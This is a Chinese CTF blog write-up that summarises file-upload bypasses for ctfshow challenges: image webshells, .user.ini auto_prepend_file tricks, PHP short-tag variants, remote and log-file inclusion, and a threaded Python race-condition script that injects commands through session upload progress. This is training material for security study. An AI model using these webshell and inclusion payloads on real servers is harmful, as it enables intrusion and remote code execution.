[Web安全学习] ctfshow-文件上传总结

最新推荐文章于 2024-05-11 19:14:19 发布
最新推荐文章于 2024-05-11 19:14:19 发布
阅读量582 收藏 2
点赞数 1
分类专栏: 安全学习 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45834505/article/details/119303982
版权

文章目录

文件上传

绕过file_info和getimagesize

[HarekazeCTF2019]Avatar Uploader 1
在这里插入图片描述
file_info判断为png,而getimagesize判断结构不能为png,又因为file_info可以识别 png 图片( 十六进制下 )的第一行,而getimagesize 不可以
找一张符合条件的png图片,winhex保留文件头,将其与多余部分删除,保存编辑好的png图片上传即可绕过限制。

thinkphp中的Upload

熟悉 thinkphp 的应该知道, upload() 函数不传参时为多文件上传,整个 $_FILES 数组的文件都会上传保存。

题目中只限制了 $_FILES[file] 的上传后缀,也只给出 $_FILES[file] 上传后的路径,那我们上传多文件就可以绕过 php 后缀限制。

ctfshow

图片马

<?php eval($_POST[a]);?>

文件后缀修改为jpg,png,gif等,burp修改上传成功后的后缀为.php(或其他根据过滤情况)

利用上传user.ini进行文件上传绕过

user.ini说明:

PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样效果。

除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER['DOCUMENT_ROOT'] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。

在 .user.ini 风格的 INI 文件中只有具有 PHP_INI_PERDIRPHP_INI_USER 模式的 INI 设置可被识别。

也就是说如果你目录下有user.ini会先去识别里面的配置,只有PHP_INI_PERDIR和PHP_INI_USER可以。
相关配置:auto_append_file和auto_prepend_file
一个相当于在每个php文件尾加上 include(“xxxx”),一个相当于文件头加上 include(“xxx”)
其中xxx就是 auto_append_file的值。
另外还发现了这么一条
在这里插入图片描述
如果题目在php.ini中设置了 open_basedir,那么我们就可以上传.user.ini进行修改open_basedir的值,回到这个题。为了利用auto_append_file,我们首先上传一个带木马的图片,接着上传.user.ini内容为 auto_append_file=“xxx” xxx为我们上传的文件名。
这样就在每个php文件上包含了我们的木马文件。(类似在php中插入了require(./a.jpg);)

.user.ini

//GIF89a 
auto_prepend_file=1.png

1.png

#define width 1337
#define height 1337
 
<?php @eval($_POST[a]);?>

在这里插入图片描述
在这里插入图片描述

接下来访问
这种方法条件:.user.ini可以上传(上传.user.png后修改后缀为.ini可以上传成功),服务器是nginx(服务器不解析.php,.phtml等),同级upload目录下有index.php
在这里插入图片描述

PHP短标签绕过图片马限制

羽师傅的WP中给出了几种PHP短标签:
1.

<? echo '123';?>

前提是开启配置参数short_open_tags=on
2.

<?=(表达式)?>  等价于 <?php echo (表达式)?>

不需要开启参数设置
3.

<% echo '123';%>

前提是开启配置参数asp_tags=on,经过测试发现7.0及以上修改完之后也不能使用,而是报500错误,但是7.0以下版本在修改完配置后就可以使用了。
4.

<script language=”php”>echo '123'; </script>

不需要修改参数开关,但是只能在7.0以下可用。
5. 图片马改成:

<?=`tac ../f*`;?>

php会将``中的内容当作代码执行。
6 . 过滤了[],用{}代替

<?=eval($_POST{a});?>

利用日志包含绕过(web 160)

对于反引号和空格也给ban了可以尝试远程文件包含,木马写在自己的服务器上

GIF89a //有的会要求验证图片头
<?=include"http://***.***.***.***/Ev1near"?>

日志包含
如果log被ban也可以,用拼接绕过上传完.user.ini和图片后访问网站然后修改ua头信息,然后访问/upload/得到flag

<?=include"/var/lo"."g/nginx/access.lo"."g"?>

在这里插入图片描述

session文件包含(条件竞争)

原理
上传.user.ini,上传图片马,最后条件竞争
在这里插入图片描述
羽师傅的条件竞争脚本:

import requests
import threading
session=requests.session()
sess='yu22x'
url1="http://f275f432-9203-4050-99ad-a185d3b6f466.chall.ctf.show/"
url2="http://f275f432-9203-4050-99ad-a185d3b6f466.chall.ctf.show/upload"
data1={
	'PHP_SESSION_UPLOAD_PROGRESS':'<?php system("tac ../f*");?>'
}
file={
	'file':'yu22x'
}
cookies={
	'PHPSESSID': sess
}

def write():
	while True:
		r = session.post(url1,data=data1,files=file,cookies=cookies)
def read():
	while True:
		r = session.get(url2)
		if 'flag' in r.text:
			print(r.text)
			
threads = [threading.Thread(target=write),
       threading.Thread(target=read)]
for t in threads:
	t.start()

待更新…

Y1seco
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctf文件上传
Zheng_Jay的博客
11-15 3901
客户端校验 最简单的文件校验是本地js校验,一般都是要求只能上传jpg,png,gif图片格式: 应对措施:在本地禁用js。 服务端校验 服务端校验比较棘手一点。 MIME类型校验 虽然我们在客户端同过禁用js上传了文件,但服务端还会再对文件类型进行校验,并且校验的是MIME。 我们在开发者工具中,虽然看到文件发送成功: 但如果服务端对我们请求的数据中的MIME类型进行校验,发现并非image类型,仍会丢弃。 所以,我们要修改请求包中的MIME类型(使用burp suit),常见的MIME类型:
PHP获取远程图片宽、高
李维山的博客
02-20 457
使用函数 getimagesize: <?php $remote_png_url = 'http://xxx.png'; $img_data = getimagesize($remote_png_url); print_r($img_data); 打印结果如下: Array ( [0] => 290 [1] => 69 [2] => 3 [3] => width="290" height="69" [b
2024年网络安全最全CTFshow web入门——文件上传_ctfshow文件上传(1),网络安全事件分发机制及设计思路
最新发布
2401_84264727的博客
05-11 983
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。要修改的图片的路径,1.png是使用的文件,可以不存在。
BUUCTF--[HarekazeCTF2019]Avatar Uploader 1
qq_46263951的博客
07-19 413
name随便输一个,进入之后看到是让上传头像,这个应该是一个文件上传漏洞 接下来分析所给的源码 <?php error_reporting(0); require_once('config.php'); require_once('lib/util.php'); require_once('lib/session.php'); $session = new SecureClientSession(CLIENT_SESSION_ID, SECRET_KEY); // check wh..
BUUCTF HarekazeCTF2019 babyrop2
doudoudedi
11-01 1242
这道题是用printf泄露已经调用过的函数确定libc文件然后用ROPgetshell(这里有格式化字符串,没有的话可以read一个然后在泄露反正够长) exp: #coding:utf-8 #name:doudou from pwn import * #p=process('./babyrop2') p=remote('node3.buuoj.cn',28818) elf=ELF('./baby...
[HarekazeCTF2019]baby_rop
、moddemod
06-12 391
exp from pwn import * context(log_level = 'debug') proc_name = './babyrop' elf = ELF(proc_name) # p = process(proc_name) p = remote('node3.buuoj.cn', 25587) pop_rdi_ret = 0x400683 bin_sh_str = 0x601048 system_addr = elf.sym['system'] payload = 'a'.en...
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
Web安全主要关注Web应用中的漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件...
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
Web安全渗透学习-文件上传漏洞-附件资源
03-02
Web安全渗透学习-文件上传漏洞-附件资源
CTFshow-web入门-文件上传
weixin_44770698的博客
07-06 1053
CTFshow-文件上传
ctf解密图片得到flag_CTF之主机渗透系列三
weixin_42355665的博客
12-29 2013
0x00 介绍接着上一篇《CTF之主机渗透系列二》,咱们继续。还是那句话,任何工具使用均来自互联网,涉及到的技术仅用于教学,不得用于非法用途,请遵守国家安全法律法规,做一个正能量的安全人员。试题如下:第一步:我们访问链接:http://202.0.0.23/进入网页首页,通过浏览观察,找到http://202.0.0.23/NewsList.asp?SortID=17 新闻资讯页面,通过get方法...
ctf中php常见的考点
热门推荐
一个安全研究员
11-06 1万+
本博文转自:大佬博客(侵权删) 总结的很详细,忍不住转载 系统变量 123456 $_POST // 获取 post 数据,是一个字典$_GET // 获取 get 数据,是一个字典$_COOKIE // 获取 cookie$_SESSION // 获取 session$_FILE // 获取上传的文件$_REQUEST // 获取 $_GET,$_POST,$_C
BUUCTF刷题记录[HFCTF2020]BabyUpload——涉及session反序列化
u013119911的博客
06-30 1543
点开就是源代码,直接进行代码审计
CTF从入门到提升(十三)文件包含session及例题详解
anquanniu的博客
09-12 2738
具体场景——session 我们可以查一下手册,看看这个参数是默认开启: 举栗子 ​ 通过上传一个orange作为key传一个值传给这个变量,放到file函数中,再去比对file函数读取结果文件中的第一行0前面六个字符串是否匹配,如果是orange就会作为包含,否则就会显示源代码。 这道题的难点在于包含一个文件要控制里面的内容,file函数的作用是把一个整一个文件读到一个数据中去,file...
ctfshow web入门 sql注入(超详解)201-250
qq_50589021的博客
08-23 4501
web201 查询语句 //拼接sql语句查找指定ID用户 $sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';"; 返回逻辑 //对传入的参数进行了过滤 function waf($str){ //代码过于简单,不宜展示 } 需要学会: 使用--user-agent 指定agent --user-agent="Mozilla/5
ctfshow web入门 151-170文件上传wp
Firebasky的博客
11-12 1023
hhh 还是懒 链接:https://pan.baidu.com/s/1jAxmXznCWTm0UdXPc8VvCg 提取码:m9bw 复制这段内容后打开百度网盘手机App,操作更方便哦
shell中 >/dev/null 2>&1
黄亚的博客
09-28 729
shell中>/dev/null 2>&1 1. /dev/null 这条命令的作用是将标准输出1重定向到/dev/null中。/dev/null代表linux的空设备文件,所有往这个文件里面写入的内容都会丢失,俗称“黑洞”。那么执行了>/dev/null之后,标准输出就会不再存在,没有任何地方能够找到输出的内容。 2>&1 这条命令用到了重定向...
CTFSHOW WEB_AK赛
羽的博客
07-31 3027
签到_观己 既然是签到,那我们就去猜一下flag的位置以及文件名 payload:file=/flag.txt 结束 如果猜不到呢,我们只能另寻他法了 1、尝试用伪协议中的data(具体伪协议的用法可参考https://blog.csdn.net/nzjdsds/article/details/82461043)发现allow_url_include没有开启。 2、让file=/var/log/nginx/access.log发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话。(其中日志中有客
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y1seco

我们都在慢慢进步

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值